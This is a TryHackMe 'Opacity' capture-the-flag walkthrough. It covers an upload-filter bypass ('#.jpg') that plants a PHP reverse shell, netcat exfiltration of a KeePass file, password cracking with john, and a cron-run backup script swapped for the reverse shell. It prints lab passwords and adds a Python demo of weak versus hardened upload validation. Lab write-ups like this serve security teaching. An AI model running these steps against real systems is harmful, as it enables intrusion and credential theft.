Room Link: https://tryhackme.com/room/opacity
Initial Scan
Kali
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Found this page; I tried different extensions, but it looks like it only accepts extensions that images use, such as .jpg and .png.
Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali #1
python2 -m SimpleHTTPServer 81
Kali #2
Browser
http://$KALI:81/php-reverse-shell.php#.jpg
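The `#.jpg` trick works because the upload handler checks the extension of the raw URL string, where the fragment is the last thing it sees. Added example (not from the room or this write-up): a Python check that reproduces the weak validation, then a hardened version that takes the extension from the parsed URL path and confirms the fetched bytes really are an image. Hostnames and the magic-byte table are constructed for the demo.

```python
"""Added example: URL-based image "upload" validation, weak vs. hardened."""
import os
from urllib.parse import urlsplit

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Constructed magic-byte table for the allowed image types.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def naive_check(url: str) -> bool:
    """The weak check the write-up implies: looks only at the tail of the URL.
    A fragment such as '#.jpg' is enough to satisfy it."""
    return os.path.splitext(url)[1].lower() in ALLOWED_EXT


def extension_of(url: str) -> str:
    """Extension of the URL *path*, ignoring query string and fragment."""
    path = urlsplit(url).path
    return os.path.splitext(path)[1].lower()


def safe_to_store(url: str, content: bytes) -> bool:
    """Accept only if the path extension is allowed AND the downloaded bytes
    start with that type's magic number. The server should additionally save
    the file under a generated name, never the remote filename."""
    ext = extension_of(url)
    if ext not in ALLOWED_EXT:
        return False
    return content.startswith(MAGIC[ext])


if __name__ == "__main__":
    evil = "http://attacker.example:81/php-reverse-shell.php#.jpg"  # constructed
    good = "http://images.example/cat.png"                         # constructed
    print(naive_check(evil))                                # True (bypassed)
    print(safe_to_store(evil, b"<?php echo 1; ?>"))         # False
    print(safe_to_store(good, b"\x89PNG\r\n\x1a\n\x00"))    # True
```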
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Transfer file
In /opt we find a KeePass file, so I transferred it back to Kali to try to crack it.
Kali(receiving)
nc -l -p 1234 > dataset.kdbx
Victim(sending)
nc -w 3 $KALI 1234 < dataset.kdbx
Crack KeePass
Kali
/opt/john/keepass2john dataset.kdbx > johnkeepass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt
Kali
keepassx dataset.kdbx
Password: 741852963
TCP/22 - SSH
Kali
ssh sysadmin@$VICTIM
Password: Cl0udP4ss40p4city#8700
PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
The script calls backup.inc.php in the lib folder. We can't edit this file, but we can delete it and replace it, so I copied the same PHP reverse shell script that was used before and put it in place of backup.inc.php. After that I just waited until the script ran on its own.
Kali #1
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
rm -f backup.inc.php
wget http://10.10.215.36:81/php-reverse-shell.php
cp php-reverse-shell.php backup.inc.php
Kali #2